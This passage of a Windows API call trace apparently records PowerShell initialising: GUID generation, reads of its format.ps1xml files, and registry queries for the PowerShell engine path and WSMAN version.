	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x53bf4c09, Data2=0xf332, Data3=0x4cc0, Data4=([0]=0xa4, [1]=0xd7, [2]=0xd6, [3]=0xd4, [4]=0x76, [5]=0x9a, [6]=0xed, [7]=0xa4))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd6a80d6c, Data2=0x944e, Data3=0x467e, Data4=([0]=0xbb, [1]=0x78, [2]=0x4e, [3]=0x62, [4]=0xc1, [5]=0x2d, [6]=0xd2, [7]=0x9d))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x764edeb8, Data2=0xacb3, Data3=0x43a6, Data4=([0]=0xa2, [1]=0x3a, [2]=0xb0, [3]=0x75, [4]=0xb9, [5]=0xad, [6]=0xf2, [7]=0x3))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x783c45df, Data2=0xd55c, Data3=0x4330, Data4=([0]=0x86, [1]=0xc0, [2]=0xb9, [3]=0x1b, [4]=0x1e, [5]=0xac, [6]=0x6, [7]=0xe9))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x49c0e2ee, Data2=0x9aa3, Data3=0x4bb7, Data4=([0]=0xac, [1]=0xdd, [2]=0xae, [3]=0x9d, [4]=0xc0, [5]=0x4f, [6]=0xde, [7]=0x1d))) returned 0x0
	[0427.777] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xda9a1241, Data2=0xbd05, Data3=0x4c14, Data4=([0]=0x8f, [1]=0x57, [2]=0x21, [3]=0xa3, [4]=0x80, [5]=0x89, [6]=0x15, [7]=0x91))) returned 0x0
	[0427.778] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x5e204012, Data2=0xf193, Data3=0x4ea3, Data4=([0]=0xb2, [1]=0x36, [2]=0xd6, [3]=0x2a, [4]=0xd7, [5]=0x4f, [6]=0xe2, [7]=0xb9))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x340d9028, Data2=0xb3f, Data3=0x4d3f, Data4=([0]=0x8b, [1]=0xd9, [2]=0x8, [3]=0x89, [4]=0x1e, [5]=0xa0, [6]=0xc0, [7]=0x39))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x385e6e6c, Data2=0x9ca3, Data3=0x4475, Data4=([0]=0x92, [1]=0x49, [2]=0x23, [3]=0x11, [4]=0x5e, [5]=0x3c, [6]=0x19, [7]=0x55))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x29e9639b, Data2=0x868c, Data3=0x4359, Data4=([0]=0x88, [1]=0xed, [2]=0x12, [3]=0x1f, [4]=0x33, [5]=0xf1, [6]=0x1f, [7]=0xda))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd0feb85a, Data2=0xe060, Data3=0x4c03, Data4=([0]=0x99, [1]=0x6, [2]=0xb5, [3]=0x17, [4]=0xa7, [5]=0xf1, [6]=0x35, [7]=0xf))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xa18c33f0, Data2=0x9af8, Data3=0x4911, Data4=([0]=0x8d, [1]=0x62, [2]=0x59, [3]=0x40, [4]=0x31, [5]=0xda, [6]=0x20, [7]=0x7f))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2a1d57b1, Data2=0xe7af, Data3=0x499e, Data4=([0]=0x94, [1]=0x94, [2]=0x78, [3]=0x60, [4]=0x24, [5]=0xbd, [6]=0x7e, [7]=0x2f))) returned 0x0
	[0427.784] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2baafdfe, Data2=0x2c0, Data3=0x4fec, Data4=([0]=0x9d, [1]=0xc6, [2]=0x7b, [3]=0xcf, [4]=0x58, [5]=0xbe, [6]=0xc7, [7]=0xe9))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xda7762d0, Data2=0x856b, Data3=0x4cda, Data4=([0]=0x90, [1]=0x45, [2]=0x72, [3]=0x77, [4]=0x32, [5]=0xbd, [6]=0xfa, [7]=0x19))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xbad150f1, Data2=0x5b90, Data3=0x49ea, Data4=([0]=0xb8, [1]=0x7e, [2]=0x3d, [3]=0x5e, [4]=0x3b, [5]=0x4f, [6]=0xb2, [7]=0x66))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x108f83f6, Data2=0x899c, Data3=0x451f, Data4=([0]=0xa7, [1]=0xdf, [2]=0x5e, [3]=0x18, [4]=0xdf, [5]=0xa6, [6]=0xf, [7]=0x39))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x76f883c, Data2=0xc55c, Data3=0x4799, Data4=([0]=0x99, [1]=0x59, [2]=0xaf, [3]=0xd6, [4]=0x83, [5]=0x5f, [6]=0xba, [7]=0xbe))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xbf0ed713, Data2=0x6494, Data3=0x47b3, Data4=([0]=0x8b, [1]=0xfd, [2]=0xd8, [3]=0xff, [4]=0xf7, [5]=0x1a, [6]=0xb, [7]=0x45))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x49d17f11, Data2=0xe673, Data3=0x4dad, Data4=([0]=0xa4, [1]=0x3c, [2]=0x5b, [3]=0xd4, [4]=0xbc, [5]=0xdd, [6]=0x39, [7]=0x28))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xafc7aae8, Data2=0x317, Data3=0x4722, Data4=([0]=0xb4, [1]=0xab, [2]=0x2a, [3]=0x56, [4]=0x82, [5]=0x4f, [6]=0x3e, [7]=0x3a))) returned 0x0
	[0427.785] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xc9ecf9f5, Data2=0x89af, Data3=0x4566, Data4=([0]=0xb6, [1]=0xe2, [2]=0x67, [3]=0x1e, [4]=0x8, [5]=0x63, [6]=0xf8, [7]=0xa5))) returned 0x0
	[0427.786] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0427.786] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x8b4, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31af2bc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31af2bc*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x31afea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31afea0*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0427.788] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0427.788] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0427.788] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0427.788] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0427.788] CoTaskMemFree (pv=0x2a5400) 
	[0427.788] RegCloseKey (hKey=0x1c4) returned 0x0
	[0427.788] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x26e2e82e, Data2=0xaed2, Data3=0x4d17, Data4=([0]=0x97, [1]=0xd3, [2]=0x36, [3]=0xfc, [4]=0xa7, [5]=0x8b, [6]=0xf7, [7]=0x2e))) returned 0x0
	[0427.789] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x777d11cc, Data2=0x780e, Data3=0x4256, Data4=([0]=0xa3, [1]=0x71, [2]=0x19, [3]=0x19, [4]=0x89, [5]=0xeb, [6]=0xad, [7]=0x69))) returned 0x0
	[0427.789] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0427.789] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0xe98, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31ed288, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31ed288*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.790] ReadFile (in: hFile=0x1c4, lpBuffer=0x31edc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x31edc88*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0427.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0427.791] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0427.791] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0427.791] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0427.791] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0427.791] CoTaskMemFree (pv=0x2a5400) 
	[0427.791] RegCloseKey (hKey=0x1c4) returned 0x0
	[0427.791] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xb5c61672, Data2=0xafd5, Data3=0x4a75, Data4=([0]=0xac, [1]=0xcd, [2]=0x6f, [3]=0x9e, [4]=0xfe, [5]=0x1c, [6]=0x68, [7]=0x94))) returned 0x0
	[0427.792] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6b33a629, Data2=0x5f1e, Data3=0x42f2, Data4=([0]=0xb7, [1]=0xa7, [2]=0x4f, [3]=0xb7, [4]=0x2b, [5]=0x86, [6]=0x56, [7]=0x8c))) returned 0x0
	[0427.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0427.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0428.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0428.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0428.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0428.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0428.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0428.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0428.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0428.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0428.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0428.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0428.577] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.577] CoTaskMemFree (pv=0x290840) 
	[0428.578] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.578] CoTaskMemFree (pv=0x290840) 
	[0428.580] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.580] CoTaskMemFree (pv=0x290840) 
	[0428.581] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.581] CoTaskMemFree (pv=0x290840) 
	[0428.589] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.589] CoTaskMemFree (pv=0x290840) 
	[0428.591] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.591] CoTaskMemFree (pv=0x290840) 
	[0428.592] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0428.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.592] CoTaskMemFree (pv=0x290840) 
	[0428.832] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d718 | out: phkResult=0x18d718*=0x1c4) returned 0x0
	[0428.833] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d61c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d618, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d61c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d618*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0428.833] CoTaskMemFree (pv=0x0) 
	[0428.834] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0428.834] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x0, lpValueName=0x22c760, lpcchValueName=0x18d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0428.834] CoTaskMemFree (pv=0x22c760) 
	[0428.834] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0428.834] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x1, lpValueName=0x22c760, lpcchValueName=0x18d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0428.835] CoTaskMemFree (pv=0x22c760) 
	[0428.835] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0428.835] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x2, lpValueName=0x22c760, lpcchValueName=0x18d6c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d6c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0428.835] CoTaskMemFree (pv=0x22c760) 
	[0428.836] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d6ac, lpData=0x0, lpcbData=0x18d6a8*=0x0 | out: lpType=0x18d6ac*=0x1, lpData=0x0, lpcbData=0x18d6a8*=0x8) returned 0x0
	[0428.836] CoTaskMemAlloc (cb=0xc) returned 0x2a92e0
	[0428.836] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d67c, lpData=0x2a92e0, lpcbData=0x18d678*=0x8 | out: lpType=0x18d67c*=0x1, lpData="2.0", lpcbData=0x18d678*=0x8) returned 0x0
	[0428.836] CoTaskMemFree (pv=0x2a92e0) 
	[0429.125] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d668 | out: phkResult=0x18d668*=0x1bc) returned 0x0
	[0429.125] RegQueryInfoKeyW (in: hKey=0x1bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d56c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d568*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.125] CoTaskMemFree (pv=0x0) 
	[0429.125] CoTaskMemAlloc (cb=0x204) returned 0x22c760
